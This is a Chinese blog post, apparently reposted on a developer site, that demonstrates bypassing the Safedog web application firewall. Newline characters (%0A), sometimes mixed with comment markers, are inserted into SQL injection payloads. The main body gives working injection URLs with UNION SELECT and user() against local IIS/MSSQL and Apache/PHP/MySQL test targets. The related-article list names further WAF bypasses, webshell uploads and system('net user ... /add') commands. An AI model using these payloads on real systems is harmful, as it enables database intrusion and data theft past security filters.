php网站安全狗绕过,网站安全狗最新版绕过测试

最新推荐文章于 2024-02-16 20:00:00 发布
最新推荐文章于 2024-02-16 20:00:00 发布
阅读量186 收藏
点赞数
文章标签: php网站安全狗绕过

测试时间:2014.10.21

测试版本:IIS版V3.3.09476(2014-09-24)、Apache V3.1.08512(2014-05-29),均为今天能下到的最新版。

用于绕过的核心字符:%0A,某些特殊场合需要和注释符配合使用。

测试详细步骤:

1、本机安装了存在注入的V5shop(构架为IIS6+ASPX+MSSQL2005,以测试IIS版本的安全狗),常规注入测试:

Default

http://192.168.91.152/cart.aspx?act=buy&id=1 AND 1=user

1

http://192.168.91.152/cart.aspx?act=buy&id=1 AND 1=user

7207176309f56931c24017adf2bc7f4e.png

AND作为关键字被识别并拦截。

2、加入%0A再次尝试:

Default

http://192.168.91.152/cart.aspx?act=buy&id=1%0AAND 1=user

1

http://192.168.91.152/cart.aspx?act=buy&id=1%0AAND 1=user

406ed4bd18c407556be53ea0dc859ba8.png

成功绕过并实现注入。

另外:在Apache+php+Mysql环境中:

先按常规进行注入尝试:

Default

http://192.168.91.152:8000/About.php?did=2 and/**/(select user())=”

1

http://192.168.91.152:8000/About.php?did=2 and/**/(select user())=”

b312df366c792e7c9e6a9ff11797a1a4.png

因为and、user()均为黑名单里的关键字。那么我们加入%0A再次尝试:

Default

http://192.168.91.152:8000/About.php?did=2%0Aand/**/(select%0Auser())=”

http://192.168.91.152:8000/About.php?did=2%0Aand/**/(select%0Auser())=’root@localhost’

1

2

3

http://192.168.91.152:8000/About.php?did=2%0Aand/**/(select%0Auser())=”

http://192.168.91.152:8000/About.php?did=2%0Aand/**/(select%0Auser())=’root@localhost’

712dfafc5678b60a6497fc2d23a9fa44.png

当然,%0A只是一个思路,由此发散开来便是多个%0A叠加,或者与注释符–、/**/混合使用。比如:

Default

http://192.168.91.152:8000/About.php?did=-2%0Aunion--%0Aselect%0Auser()

1

http://192.168.91.152:8000/About.php?did=-2%0Aunion--%0Aselect%0Auser()

b7de7d3312f739d68f6f362297a557ca.png

成功绕过,毫无压力 。

此方法仅供学习研究,切勿用于非法用途。若需转载,请保留版权(STD兄弟连)

另:测试用到的安全狗版本已打包:http://pan.baidu.com/s/1c05v54k (包含了IIS和Apache版本)

[via@phpsec]

嘉实体育
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
绕过安全狗_安全狗Bypass绕过
weixin_39604819的博客
01-11 1758
纸上得来终觉浅,绝知此事要躬行。安全狗的版本是4.0(最新的啦)在实战中会经常遇到waf很困扰,有时候站点有waf连报错都不会回显给你,这就很难受特此做一篇文章总结我学习绕狗的知识总结以安全狗为例,后续会出D盾、守护神等等有时间就做一些总结第一步确认已经打开安全狗,判断是否存在注入点由此可见安全狗对我们的不友好,按照拦截的思路,安全狗是拦截and 1=1一个整体的。如果你输入id?=1 ...
记一次绕过安全狗与360艰难提权
XunanSec的博客
06-07 1856
端午短暂休息三天,复工之后朋友又丢给我一个,在打台球途中了解了一下这个奇怪的,说是无法执行命令,经过测试发现只能执行命令,确实奇怪,草草打了几局台球就回去拿起电脑开日菜刀上面写着当前用户为,但是执行任何命令都没有回显,要不是这个可以上传下载浏览文件,我都怀疑这个是假的了难道是禁用了高危函数吗?查看发现也没禁用呀至于这种没有任何回显的,一时间有点不知所措,那么就先翻一下文件吧(这是在没有思路情况下的一种思路) 顺便也可以了解目标机器的环境,是否存在杀软,是否宝塔面板搭建的等等......每一个环境都有每一种思
安全狗阻止iis运行php,网站安全狗禁止IIS执行程序bypass
weixin_42389030的博客
03-12 374
网站安全狗会拦截命令的执行:执行白名单中的程序不会被拦截:但是执行白名单中的程序并不是我们想要的结果(我想要提权,想要执行exp.exe),那该怎么办呢?经过反复的测试,发现安全狗拦截的是IIS(时间久远,具体是aspnet_wp.exe还是w3wp.exe我记不清了)创建的进程。由IIS启动的进程再去执行命令会不会被拦截呢?但是在想这个问题的时候,要先解决一个问题,那就是如何让IIS启动的进程再...
00截断上传绕过_绕过网站安全狗拦截,上传Webshell技巧总结(附免杀PHP一句话)...
weixin_39663970的博客
12-20 240
思路是:修改HTTP请求,构成畸形HTTP请求,然后绕过网站安全狗的检测。废话不多说,切入正题。。。。1、实验环境:Windows Server 2003、 Apache/2.4.18、PHP/5.3.29、网站安全狗(Apache版)V3.5.120482、用于文件上传的PHP源码:...
安全狗阻止sublime text 编辑器修改保存PHP文件解决方法
Leesanghyeok的博客
12-04 220
在sunlime text编辑器删修改后无法保存,出现下图问题 解决办法: 打开安全狗,找到主动防御->文件及目录保护->全站禁止写入PHP-ASP-ASPX处,如下图所示 点击该项进入->高级规则设置->进程名->白名单模式,加入sublime_text.exe ...
Web应用安全:使用SQL注入绕过认证.pptx
06-17
在这个主题中,我们将详细探讨如何使用SQL注入来绕过认证过程,主要关注两类注入——数字型注入和字符型注入,以及一些其他类型的注入方法。 1. **数字型注入**: 数字型注入通常发生在URL参数中,例如`...
PHP_saomiao.zip_php 安全
09-23
首先,**后门**是指恶意攻击者在网站中植入的隐蔽代码,使得他们能够绕过正常的验证机制,获得对系统的非法访问权限。这些后门可能隐藏在源代码中,或者利用系统漏洞进行注入。因此,定期扫描网站以查找并移除后门至...
PHP5全版本绕过open_basedir读文件脚本漏洞详细介绍
10-24
主要介绍了PHP5全版本绕过open_basedir读文件脚本漏洞详细介绍,这个漏洞很久之前(大概5年前)被提出来了,到现在的最新版本中依然存在,需要的朋友可以参考下
PHP 编程安全性小结
12-17
纵深防御策略意味着采取多重保护措施,即使某一层次的安全措施被绕过,还有其他防线可以防止攻击。例如,即使在使用正则表达式验证GET变量为数字后,仍需对SQL查询使用预处理语句或参数绑定,以防止SQL注入。这种...
木翼下载系统中说明的PHP安全配置方法
10-30
3. safe_mode绕过PHP 4.2.2之前的版本,特别是4.0.5及以下,存在通过mail函数绕过safe_mode限制执行命令的漏洞。例如,通过在URL参数中添加分号和shell命令,可以执行任意系统命令。 为了防止这些威胁,应确保PHP...
绕过安全狗继续注入的思路
08-30
绕过安全狗继续注入的思路。
bypasswaf:关于安全狗和云锁的自动化绕过脚本
03-20
旁通 为避免非法用途而进行的学习 2.0:增加优化了部分规则现在bypass云锁篡改及bypass安全狗篡改支持所有的注入类型了!更新了bypass安全狗任意文件上传的方法(适用于业务系统存在的任何文件上传碎片但服务器安装了安全狗环境)更新了bypass安全狗SQL注入篡改,现在支持所有类型的注入了 针对最新版云锁和安全狗的sqlmap自动化绕过脚本 包含:绕过安全狗sql注入篡改绕过云锁SQL注入篡改(可0警告绕过云锁)理论上来说规则越多速度也会越慢所以不追求隐蔽性的可以按需求修改规则 针对最新版安全狗的任意文件上传bypass safedog_upload_yichu.txt safedog_upload_huanhang.txt 利用知识点: 安全狗:内联注释博客: : 云锁:引号包裹注释符绕过检测博客: : 云锁:多行注释符嵌入#绕过检测博客: : 文件上传:Conten
WAF相关知识及安全狗的部署和绕过
北冥同学的成长记录笔记
07-16 3380
WAF即Web应用程序防火墙通过过滤和监视Web应用程序与Internet之间的HTTP通信来帮助保护Web应用程序,Web Application Firewall (WEB 应用防护系统)。
渗透学习-靶场篇-安全狗的安装与绕过实验(后续还会更新)
qq_43696276的博客
07-22 3430
在经过上一篇的sql、文件上传的基础学习后,以下将正式进入靶场的学习与训练当中。本文以下将进行对WAF的绕过实验。但是经过下面的尝试后发现自己实力还是不够的!因此,我打算再搞完这个之后,我将再学习一段时间再来复盘!!!虽然大致上走了一遍安全狗的waf绕过,但是我感觉还有很多的不足之处,对于绕过WAF的原理可能还不明白,因此还需继续加油!!
web攻防漏洞之Bypass安全狗绕过
s11show_163的博客
02-28 1144
目的:攻击者在被害者网站上挂载一个自己的木马文件1.php,然后通过在攻击者电脑上访问该挂载文件来实现对被害者网站或者被害者电脑进行侵害。 攻击者希望执行: 创建服务器用户: key=echo('<pre>');system('net user a a /add'); 删除服务器用户: key=echo('<pre>');system('net user a /del')...
安全狗绕过
最新发布
jxy158212的博客
02-16 322
对于sql注入漏洞,针对安全狗绕过
突破安全狗
duan_qiao925的博客
06-05 795
实验准备 Sql注入原理:用户能控制输入并构造恶意参数(多为sql语句),Web应用执行的代码拼接了未加过滤的nei'rong。
SQL注入-安全狗apache最新版绕过
crowsec
01-26 1572
微信公众号:乌鸦安全 扫取二维码获取更多信息! 01背景知识 现在的环境下对web选手越来越不友好,如果想在web场景中去挖洞,基本上都要面对waf,而常用的waf产品有很多,本次以开源免费最新版安全狗为例,绕过waf获取数据。 tips:本文需要您提前掌握一定的基础知识! 02环境配置 Windows10主机 phpstudy2018 sqli-labs靶场 安全狗apache4.0.30255 当前版本是最新版安全狗(截止2021.05.17) ...
绕过网站安全狗拦截,上传Webshell技巧总结(附免杀PHP一句话)
xuchen16的博客
09-26 5821
转载自:http://www.freebuf.com/articles/web/125084.html *本文原创作者:1_2,本文属FreeBuf原创奖励计划,未经许可禁止转载 这篇文章我介绍一下我所知道的绕过网站安全狗上传WebShell的方法。 思路是:修改HTTP请求,构成畸形HTTP请求,然后绕过网站安全狗的检测。 废话不多说,切入正题。。。。 1、实验环境: Windows...
SERVER全局变量绕过
09-03
SERVER全局变量的绕过是指通过某种方式绕过服务器端的检查,直接访问或修改服务器的全局变量。在PHP中,设置register_globals选项为开启时,可以将EGPCS(Environment, Get, Post, Cookie, Server)变量注册为全局...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值